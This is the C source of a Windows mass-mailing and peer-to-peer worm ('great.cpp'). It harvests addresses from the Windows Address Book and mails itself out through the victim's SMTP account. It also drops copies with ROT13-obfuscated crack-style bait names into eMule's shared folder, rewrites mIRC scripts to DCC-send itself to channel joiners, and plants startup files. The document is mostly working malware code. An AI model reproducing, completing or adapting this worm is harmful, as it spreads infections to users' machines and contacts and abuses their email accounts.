great.cpp

It is inserted that the worm will duplicate great.exe to get the systematic materials in the compute

}

int SendCmd(SOCKET wSocket, char* szStr, char* data)
{
	int len, res = 1;
	char szBuf[520], szRes[10] = "250";

	if (!stricmp(szStr, CMD_DATA))
		strcpy(szRes, "354");
	wsprintf(szBuf, szStr, data);
	if (send(wSocket, szBuf, strlen(szBuf), 0) == SOCKET_ERROR)
		return SOCKET_ERROR ;
	if ((len = recv(wSocket, szBuf, 520, 0)) == SOCKET_ERROR)
		return SOCKET_ERROR;
	*(szBuf + len) = (unsigned short)0x0000;//'\0';
	if (len < 4 || strncmp(szBuf, szRes, 3) != 0)
		res = -1;
	return (res);
}

int SendData(SOCKET wSocket, char* szMail)
{
	HANDLE hFile;
	DWORD dwRead = 0;
	char* lpBuf[520];
	int res = 1;

	if ((hFile = CreateFile((LPCTSTR) szMail, GENERIC_READ, FILE_SHARE_READ,
	NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, (HANDLE) NULL)) == (HANDLE) -1)
	{
		return(-1);
	}

	do
	{
		ReadFile(hFile, (LPVOID) lpBuf, 512, &dwRead, NULL);
		if (dwRead)
			if (send(wSocket, (const char *) lpBuf, LOWORD(dwRead), 0) ==	SOCKET_ERROR)
			{
				res = SOCKET_ERROR;
				goto exitq;
			}
	}
	while (dwRead);
exitq:
	CloseHandle(hFile);
	return(res);
}

UINT vGetSystem()
{
	DWORD dwVer;
	UINT res, j;

	dwVer = GetVersion();
	j = LOBYTE(LOWORD(dwVer)) * 100 + HIBYTE(LOWORD(dwVer));
	if ((j >= 395) && ((dwVer >> 16) & 0x8000))
	{
		res = 1;
	}		//Win95/98/ME
	if ((j >= 350) && (!((dwVer >> 16) & 0x8000)))
	{
		res = 1000;
	}	  //WinNT/2000/XP

	return(res);
}

UINT WhoGetMail(char* szMail, char* szValue, char* szBuf)
{
#define	ADDRBUFFER		0x10000

	char szTarg[MAX_PATH], szBook[MAX_PATH], szPath[MAX_PATH];
	char* lpBuf;
	
	WIN32_FIND_DATA fileinfo;
	HANDLE hFHandle;
	HGLOBAL hMem;
	HANDLE hFile, hMap;
	DWORD cnt, base1, maxsize, dwRes = 0, b;
	UINT res = 0, i = 0, j = 0, k = 0, uCode = 0;
	unsigned char *ptr;
	char email[128];

	GetWindowsDirectory(szPath, 256);
	if (vGetSystem() == 1)
	{
		strcat(szPath, "\\Application Data\\Microsoft\\Address Book");	//WIN98/ME
		sprintf(szBook, "%s\\*.WAB", szPath);
	}
	else
	{
		strcpy(szPath,"C:\\Documents and Settings\\Administrator\\Application Data\\Microsoft\\Address Book");	
		wsprintf(szTarg, "Software\\Microsoft\\WAB\\WAB4\\Wab File Name");

		j = 1;
		if (vGetReg(HKEY_CURRENT_USER, szTarg, "", szBook) != ERROR_SUCCESS)
		{
			sprintf(szBook, "%s\\*.WAB", szPath);j = 0;
		}
	}

	hMem = GlobalAlloc(GMEM_MOVEABLE | GMEM_ZEROINIT, ADDRBUFFER);
	if (hMem == NULL)
		return((UINT) -3);
	lpBuf = (char *)GlobalLock(hMem);

	if ((hFHandle = FindFirstFile(szBook, &fileinfo)) == INVALID_HANDLE_VALUE)
	{
		res = (UINT) -1;
		goto ex01;
	}

	do
	{
		if (j == 0)
			sprintf(szBook, "%s\\%s", szPath, fileinfo.cFileName);

		hFile = CreateFile(szBook, GENERIC_READ,
					FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
					FILE_ATTRIBUTE_NORMAL, NULL);

		if (hFile == NULL || hFile == INVALID_HANDLE_VALUE)
			return 1;
		maxsize = GetFileSize(hFile, NULL);
		hMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
		if (hMap == NULL || hMap == INVALID_HANDLE_VALUE)
		{
			CloseHandle(hFile);
			return 2;
		}
		ptr = (unsigned char *) MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0);
		if (ptr == NULL)
		{
			CloseHandle(hMap);
			CloseHandle(hFile);
			return 3;
		}
		base1 = *((DWORD *) (ptr + 0x60));
		cnt = *((DWORD *) (ptr + 0x64));
		for (i = 0; i < cnt; i++)
		{
			b = base1 + i * 68;
			memset(email, '\0', sizeof(email));
			for (j = 0; (b < maxsize) && (j < 68); j++, b += 2)
			{
				email[j] = ptr[b];
				if (ptr[b] == 0)
					break;
			}
			if (j > 0)
			res = SendMail(szMail, email, szValue, szBuf);
		}
		UnmapViewOfFile(ptr);
		CloseHandle(hMap);
		CloseHandle(hFile);
	}
	while (FindNextFile(hFHandle, &fileinfo));
	FindClose(hFHandle);

ex01:
	GlobalUnlock(hMem);
	GlobalFree(hMem);

	return(res);
}

typedef unsigned int UINT;
UINT MailWork(HANDLE hInst, char* szEml)
{
	char szValue[256], szPath[256], szMail[256];
	char szTarg[256] =
	{
		0
	};
	UINT res = 0, i;
	for (i = 0; i < 5; i++)
	{
		wsprintf(szPath,
			"Software\\Microsoft\\Internet Account Manager\\Accounts\\%08d", i);

		if (vGetReg(HKEY_CURRENT_USER, szPath, "SMTP Server", szValue) ==
			ERROR_SUCCESS)
		{
			vGetReg(HKEY_CURRENT_USER, szPath, "SMTP Email Address", szMail);
			res = WhoGetMail(szMail, szValue, szEml);
		}
	}

	return(res);
}

UINT MailTo(HANDLE hInst, char* szTitle, char* szFile)
{
	char szMail[260], szDir[260];
	UINT res = 0;
	GetWindowsDirectory(szDir, 256);
	sprintf(szMail, "%s\\temp\\%s.eml", szDir, szTitle);	
	SaveMailBody(szFile, szMail);
	res = MailWork(hInst, szMail);
	return res;
}

void spread_use_mail(HINSTANCE hInstance)
{
	char current_file[MAX_PATH];
	GetModuleFileName(NULL,current_file,MAX_PATH);
	MailTo(hInstance,"Home work for U!",current_file);
}


short WormCopy(char SRCFileName[], char DSTFileName[])
{
	FILE *SRC, *DST;
	char Buffer[1024];
	short Counter = 0;
	short Status = 0;
	SRC = fopen(SRCFileName, "rb");
	if(SRC)
	{
		DST = fopen(DSTFileName, "wb");
		if(DST)
		{
			while(! feof(SRC))
			{
				Counter = fread(Buffer, 1, 1024, SRC);
				if(Counter)
				fwrite(Buffer, 1, Counter, DST);
			}
		Status = 1;
		}
	}
	fclose(SRC);
	fclose(DST);
	return Status;
}

char* emule_names[] =
{
	"jvanzc5",			// "winamp5"
	"vpd2004-svany",	// "icq2004-final"
	"npgvingvba_penpx",	// "activation_crack"
	"fgevc-tvey-2.0o"	/* missed comma in the original version */
	"qpbz_cngpurf",		// "strip-girl-2.0bdcom_patches"
	"ebbgxvgKC",		// "rootkitXP"
	"bssvpr_penpx",		// "office_crack"
	"ahxr2004"			// "nuke2004"
};

char* xstrchr(const char* str, char ch)
{
	while (*str && *str != ch)
		str++;
	return (*str == ch) ? (char *) str : NULL;
}

char rot13c(char c)
{
	char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	char l[] = "abcdefghijklmnopqrstuvwxyz";
	char* p;

	if ((p = xstrchr(u, c)) != NULL)
		return u[((p - u) + 13) % 26];
	else if ((p = xstrchr(l, c)) != NULL)
		return l[((p - l) + 13) % 26];
	else
		return c;
}

void rot13(char* buf, const char* in)
{
	while (*in)
		*buf++ = rot13c(*in++);
	*buf = 0;
}

void emule_spread(char* file)
{
	int emule_names_cnt = sizeof(emule_names) / sizeof(emule_names[0]);
	char emule[256];
	DWORD emulelen = sizeof(emule);
	HKEY hKey;
	char key_path[64], key_val[32];

	rot13(key_path, "Fbsgjner\\rZhyr");	// "Software\eMule"
	rot13(key_val, "Vafgnyy Cngu");						// "Install Path"

	// Get the path to eMule from the registry
	ZeroMemory(emule, emulelen);
	if (RegOpenKeyEx(HKEY_CURRENT_USER, key_path, 0, KEY_QUERY_VALUE, &hKey))
		return;
	if (RegQueryValueEx(hKey, key_val, 0, NULL, (PBYTE) emule, &emulelen))
		return;
	RegCloseKey(hKey);

	if (emule[0] == 0)
		return;
	lstrcat(emule,"\\Incoming");

	if (emule[lstrlen(emule) - 1] == '/')
		emule[lstrlen(emule) - 1] = '\\';
	if (emule[lstrlen(emule) - 1] != '\\')
		lstrcat(emule, "\\");
	rot13(emule + lstrlen(emule), emule_names[rand() % emule_names_cnt]);
	lstrcat(emule, ".");

	switch (rand() % 6)
	{
	case 0:
	case 1:
		lstrcat(emule, "ex"); lstrcat(emule, "e"); break;
	case 2:
	case 3:
		lstrcat(emule, "sc"); lstrcat(emule, "r"); break;
	case 4:
		lstrcat(emule, "pi"); lstrcat(emule, "f"); break;
	default:
		lstrcat(emule, "ba"); lstrcat(emule, "t"); break;
	}

	CopyFile(file, emule, TRUE);
}

void p2p_spread(void)
{
	char selfpath[MAX_PATH];
	GetModuleFileName(NULL, selfpath, MAX_PATH);

	emule_spread(selfpath);
}



void main(int argc, char **argv)
{

	FILE *gold;

	char ProgName[100];
	
	spread_use_mail(GetModuleHandle(NULL));
	p2p_spread();
		
	strcpy(ProgName, argv[0]);
	WormCopy(ProgName, "c:\\great.exe");
	gold = fopen("c:\\mirc\\script.ini","wt");
	if(!gold)
	{
		gold=fopen("c:\\Program Files\\mirc\\script.ini","wt");
	}
	if(gold)
	{
		fprintf(gold,"[script]\nn0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\nn1=/.dcc send $nick");
    	fprintf(gold," c:/great.exe\n}\n");
	}
   	fclose(gold);

	gold = fopen("c:\\mirc\\remote.ini","wt");
	if(!gold)
	{
		gold=fopen("c:\\Program Files\\mirc\\remote.ini","wt");
	}

	if(gold)
	{
		fprintf(gold,"[remote]\nn0=ctcp ^1:*:?:$1- | halt");
	}
	fclose(gold);

	gold = fopen("c:\\windows\\winbakup.bat","wt");
	if(gold)
	{
		fprintf(gold,"@cls\n");
		fprintf(gold,"@echo It's all about the Pentiums!\n");
		fprintf(gold,"@echo ------------------------------\n");
		fprintf(gold,"@echo My digital media is write-protected.\n");
		fprintf(gold,"@echo Every file inspected, no viruses detected.\n");
		fprintf(gold,"@echo I beta tested every operating system.\n");
		fprintf(gold,"@echo Gave props to some, and others? I dissed 'em.\n");
		fprintf(gold,"@echo While your computer's crashin', mine's multitaskin'..\n");
		fprintf(gold,"@echo It does all my work without me even askin'.\n");
		fprintf(gold,"@echo ------------------------------\n");
		fprintf(gold,"@echo Retro :: http://retro.host.sk \n");
	}
	fclose(gold);

	gold = fopen("c:\\windows\\STARTM~1\\programs\\startup\\great.vbs","wt");
	if(gold)
	{
		fprintf(gold,"msgbox %c It's all about the Pentiums, Baby! %c", 34, 34);
	}

}